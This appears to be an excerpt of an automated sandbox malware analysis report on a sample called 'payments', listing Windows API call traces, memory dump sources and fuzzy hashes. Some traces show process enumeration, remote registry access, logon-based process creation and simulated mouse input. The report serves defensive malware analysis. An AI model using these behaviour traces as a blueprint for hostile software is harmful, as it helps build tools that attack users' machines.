                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD09F1
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00CD09F4
                                                                                                                          • SysAllocString.OLEAUT32 ref: 00CD0A15
                                                                                                                          • SysFreeString.OLEAUT32 ref: 00CD0A1E
                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00CD0A38
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00CD0A46
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761583154-0
                                                                                                                          • Opcode ID: 35edb064d32ad40ac9d256b66b6e3312c75b25ed25f1969915859070e9de7bcb
                                                                                                                          • Instruction ID: a202ce7855bc7d8b60cc1a51a64233f442ddfe256894d60d7c7f81f108fd6a9a
                                                                                                                          • Opcode Fuzzy Hash: 35edb064d32ad40ac9d256b66b6e3312c75b25ed25f1969915859070e9de7bcb
                                                                                                                          • Instruction Fuzzy Hash: D7215175600304BFDB109BECDC89DAA77ACEB09360B10812AFA19CB365DA70ED429764
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 00CCDBD7
                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CCDBF4
                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCDC2C
                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00CCDC52
                                                                                                                          • _wcsstr.LIBCMT ref: 00CCDC5C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3902887630-2594219639
                                                                                                                          • Opcode ID: 5462f3918abd8ed04cd288ae49173fd07d98c4296b3a316e54e90d29584411d5
                                                                                                                          • Instruction ID: f95b926eb38c5d5ec48ff41b0425ac3510a7e914bc1139496455212d8fe643f7
                                                                                                                          • Opcode Fuzzy Hash: 5462f3918abd8ed04cd288ae49173fd07d98c4296b3a316e54e90d29584411d5
                                                                                                                          • Instruction Fuzzy Hash: B821D472604214BBEB159B79DC49FBB7BA9DF45750F10803DF80ACA191EFA1DD42E2A0
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CCBC90
                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CCBCC2
                                                                                                                          • __itow.LIBCMT ref: 00CCBCDA
                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CCBD00
                                                                                                                          • __itow.LIBCMT ref: 00CCBD11
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$__itow
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3379773720-2594219639
                                                                                                                          • Opcode ID: 8e1f219d54927651766bc350a05fd08967ffe3f759fd2a5334be5b880bbf3b05
                                                                                                                          • Instruction ID: c41dd58f03526b947f25ea35a5c281fba956d260c8b044affbf0b52cdc609f34
                                                                                                                          • Opcode Fuzzy Hash: 8e1f219d54927651766bc350a05fd08967ffe3f759fd2a5334be5b880bbf3b05
                                                                                                                          • Instruction Fuzzy Hash: 2B21C335600318BBDB21AEA5CC8BFDF7A6DAF49710F104028FA16EB181DB708E0597A1
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAD1BA
                                                                                                                            • Part of subcall function 00CAD17C: GetStockObject.GDI32(00000011), ref: 00CAD1CE
                                                                                                                            • Part of subcall function 00CAD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAD1D8
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CFA32D
                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CFA33A
                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CFA345
                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CFA354
                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CFA360
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                          • Opcode ID: 382471dc4299f1a3f6fe5e4f4487f8ea097c7b44adea9de149931615c1723d08
                                                                                                                          • Instruction ID: 35a29e065bb939936eb5bf2bac85591aa613cb7ef31906a218e8e35700f30495
                                                                                                                          • Opcode Fuzzy Hash: 382471dc4299f1a3f6fe5e4f4487f8ea097c7b44adea9de149931615c1723d08
                                                                                                                          • Instruction Fuzzy Hash: 9B118EB115021DBEEF115F60CC85EEBBF6DEF09798F014114BB08A60A0C6729C22DBA4
                                                                                                                          APIs
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00CACCF6
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CACD37
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00CACD5F
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00CACE8C
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CACEA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1296646539-0
                                                                                                                          • Opcode ID: 1c1279162c55082859972f112515d91589bdadde8bb80916f5f665b91d1e0523
                                                                                                                          • Instruction ID: b3d41174d136894490eb391650dbe1712129825f67893db2a44b8e866719a94b
                                                                                                                          • Opcode Fuzzy Hash: 1c1279162c55082859972f112515d91589bdadde8bb80916f5f665b91d1e0523
                                                                                                                          • Instruction Fuzzy Hash: E5B16E79A0024ADBDF10CFA9C5807EDBBB1FF09344F149529EC69EB254DB30AA50CB65
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00CF1C18
                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00CF1C26
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CF1C54
                                                                                                                            • Part of subcall function 00CB1DFC: __wsplitpath_helper.LIBCMT ref: 00CB1E3C
                                                                                                                          • _wcscat.LIBCMT ref: 00CF1C69
                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00CF1CDF
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00CF1CF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 1380811348-0
• Opcode ID: 9520731ebf71501bb75c4119ce964300944b992450366cd1fa09d1397e1f2129
• Instruction ID: 008353d2b15f04ca72cbaa60ea7084d7a855d231e0978bee0baeedfa6795ff76
• Opcode Fuzzy Hash: 9520731ebf71501bb75c4119ce964300944b992450366cd1fa09d1397e1f2129
• Instruction Fuzzy Hash: C4518E71104344AFD720EF64C885EABB7ECEF88754F04491EF98697291EB30DA05DBA2
APIs
  • Part of subcall function 00CF3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF30AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF30EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CF3112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CF313B
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CF317E
• RegCloseKey.ADVAPI32(00000000), ref: 00CF318B
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 3451389628-0
• Opcode ID: 611f84234afa1bd0bc3ca5095e2e8ce4de853a636680b0a8b1c332e4a6f2db30
• Instruction ID: 31cd37cc377a1c6f898f554912b0cdde992d5e98e924d2156f56f3a34e6a627a
• Opcode Fuzzy Hash: 611f84234afa1bd0bc3ca5095e2e8ce4de853a636680b0a8b1c332e4a6f2db30
• Instruction Fuzzy Hash: 9B513731108344AFCB04EF64C895EAEBBE9FF88304F04891DF655972A1DB31EA09DB52
APIs
• GetMenu.USER32(?), ref: 00CF8540
• GetMenuItemCount.USER32(00000000), ref: 00CF8577
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CF859F
• GetMenuItemID.USER32(?,?), ref: 00CF860E
• GetSubMenu.USER32(?,?), ref: 00CF861C
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00CF866D
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: a475ba740af209cd19cecebc2777ac78b73baf6e2ee3e83737271463ac25f0c5
• Instruction ID: fe78e47e30c5361827366f227a1f99c36658b63ce57d572f1da0e658036be6e8
• Opcode Fuzzy Hash: a475ba740af209cd19cecebc2777ac78b73baf6e2ee3e83737271463ac25f0c5
• Instruction Fuzzy Hash: F9517A31A00629AFDF11EFA8C845AEEB7B5EF48310F108459FA15FB351DB30AE459B91
APIs
• _memset.LIBCMT ref: 00CD4B10
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD4B5B
• IsMenu.USER32(00000000), ref: 00CD4B7B
• CreatePopupMenu.USER32 ref: 00CD4BAF
• GetMenuItemCount.USER32(000000FF), ref: 00CD4C0D
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CD4C3E
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: 588c8ce92b818e3f6dd00fe521279f6d53c15e1f684cd62808854aaeb4b6cbfb
• Instruction ID: dda3c709f5927b1624902168f36b08b44a952b10b4fe25fcc2348ce4f6e8559a
• Opcode Fuzzy Hash: 588c8ce92b818e3f6dd00fe521279f6d53c15e1f684cd62808854aaeb4b6cbfb
• Instruction Fuzzy Hash: 6751DF70601309EBDF28CF68C888BADBBF5AF95314F14815BE7259A390D7719A40CB61
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00D2DC00), ref: 00CE8E7C
• WSAGetLastError.WSOCK32(00000000), ref: 00CE8E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00CE8EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 00CE8EC5
• _strlen.LIBCMT ref: 00CE8EF7
• WSAGetLastError.WSOCK32(00000000), ref: 00CE8F6A
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ErrorLast$_strlenselect
• String ID:
• API String ID: 2217125717-0
• Opcode ID: 7100e25d771ec93b7d83d4c88c2f439d97772b9b0d158e85a1aee62188fd4826
• Instruction ID: 4480034c6de38473082c4264e9c7e19368fb671c35a8f01bac47bba723200932
• Opcode Fuzzy Hash: 7100e25d771ec93b7d83d4c88c2f439d97772b9b0d158e85a1aee62188fd4826
• Instruction Fuzzy Hash: 1341B371500244AFCB14EBA5CD99EEEB7BAAF48314F104269F51AE72D1DF30AE44DB60
APIs
  • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
• BeginPaint.USER32(?,?,?), ref: 00CAAC2A
• GetWindowRect.USER32(?,?), ref: 00CAAC8E
• ScreenToClient.USER32(?,?), ref: 00CAACAB
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00CAACBC
• EndPaint.USER32(?,?,?,?,?), ref: 00CAAD06
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00D0E673
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• String ID:
• API String ID: 2592858361-0
• Opcode ID: 5f2dd7c38e05da22622aed385f12c03feadb8153b46074aa37eec0eb74ffe508
• Instruction ID: 3786a40668311b2099c6ce9020d74b429afad8aa03301ca5029978b98a0e3097
• Opcode Fuzzy Hash: 5f2dd7c38e05da22622aed385f12c03feadb8153b46074aa37eec0eb74ffe508
• Instruction Fuzzy Hash: D141A170104301AFD710DF24DC84FBB7BA8EB5A329F180669F9A4C72A1C7319945DB72
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00CD98D1
  • Part of subcall function 00CAF4EA: std::exception::exception.LIBCMT ref: 00CAF51E
  • Part of subcall function 00CAF4EA: __CxxThrowException@8.LIBCMT ref: 00CAF533
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CD9908
• EnterCriticalSection.KERNEL32(?), ref: 00CD9924
• LeaveCriticalSection.KERNEL32(?), ref: 00CD999E
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CD99B3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00CD99D2
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 2537439066-0
• Opcode ID: a4576a4d3bbe6050aea5c4cac89e6fe04d52acc7cb8a6422b725df336a2f7416
• Instruction ID: 0e5f17c6f760cc7e9b153374883eb21137ec76076e8cc383e3607b46f48aad97
• Opcode Fuzzy Hash: a4576a4d3bbe6050aea5c4cac89e6fe04d52acc7cb8a6422b725df336a2f7416
• Instruction Fuzzy Hash: 9E316F35900205ABDB10AFA5DC85EAEB779FF45314B1480A9F904EB346DB70DA11DBA4
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00CE77F4,?,?,00000000,00000001), ref: 00CE9B53
                                                                                                                            • Part of subcall function 00CE6544: GetWindowRect.USER32(?,?), ref: 00CE6557
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CE9B7D
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CE9B84
                                                                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CE9BB6
                                                                                                                            • Part of subcall function 00CD7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CD7AD0
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CE9BE2
                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CE9C44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 02f79847a711204e22e482e8ad9846dbe9015c03de63c551176cb016fa898727
• Instruction ID: d4fd2dd7f327b3996d34281b324fc7ab8053f3b413465f8f6db42618b4987a95
• Opcode Fuzzy Hash: 02f79847a711204e22e482e8ad9846dbe9015c03de63c551176cb016fa898727
• Instruction Fuzzy Hash: B331E172204359ABD720DF15DC49F9AB7EAFF89314F00091AF599D7291DB30EA05CBA1
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00CCAFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 00CCAFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00CCAFC4
• CloseHandle.KERNEL32(00000004), ref: 00CCAFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CCAFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00CCB012
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 19b9c1350baee2d660b48f5afeefa0ef6d410a12debef6fc491456a98974d56b
• Instruction ID: 5c0de8f1c02fcbccc0c58abd04db2f1c35678f94130665bc699599478bc8058d
• Opcode Fuzzy Hash: 19b9c1350baee2d660b48f5afeefa0ef6d410a12debef6fc491456a98974d56b
• Instruction Fuzzy Hash: 09214CB250030DBBDB028FE4DD09FEE7BA9AB44308F148019FA11A2161C7769E21EB61
APIs
  • Part of subcall function 00CAAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAAFE3
  • Part of subcall function 00CAAF83: SelectObject.GDI32(?,00000000), ref: 00CAAFF2
  • Part of subcall function 00CAAF83: BeginPath.GDI32(?), ref: 00CAB009
  • Part of subcall function 00CAAF83: SelectObject.GDI32(?,00000000), ref: 00CAB033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CFEC20
• LineTo.GDI32(00000000,00000003,?), ref: 00CFEC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFEC42
• LineTo.GDI32(00000000,00000000,?), ref: 00CFEC52
• EndPath.GDI32(00000000), ref: 00CFEC62
• StrokePath.GDI32(00000000), ref: 00CFEC72
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 2d64e94681a3f6402a0c5d64279b3e653229dd220d224929f2b034bdb57fa7c6
• Instruction ID: 8b0a8df069140b1837897a51e7e596c418ab6348b7cdea052cf01a8a249efe15
• Opcode Fuzzy Hash: 2d64e94681a3f6402a0c5d64279b3e653229dd220d224929f2b034bdb57fa7c6
• Instruction Fuzzy Hash: 0B11097600024DBFEB029F90DC88EEA7F6DEB08354F048122BE1889260D7719E56DBA0
APIs
• GetDC.USER32(00000000), ref: 00CCE1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00CCE1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CCE1D8
• ReleaseDC.USER32(00000000,00000000), ref: 00CCE1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00CCE1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 00CCE209
  • Part of subcall function 00CC9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00CC9A05,00000000,00000000,?,00CC9DDB), ref: 00CCA53A
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
• Opcode ID: 43995850825c042b54173e7f2dfa89558363e227294fc1e99e9e138ec4a53a31
• Instruction ID: b671e23052833db10e970aa9ef0611df2b421fd9794b25e1afe034de5a4d3992
• Opcode Fuzzy Hash: 43995850825c042b54173e7f2dfa89558363e227294fc1e99e9e138ec4a53a31
• Instruction Fuzzy Hash: 3C0171B5A00718BBEB109BA5CC45F5EBFA9EB49351F048066EA04E7391DA709D018B60
APIs
• __init_pointers.LIBCMT ref: 00CB7B47
  • Part of subcall function 00CB123A: __initp_misc_winsig.LIBCMT ref: 00CB125E
  • Part of subcall function 00CB123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CB7F51
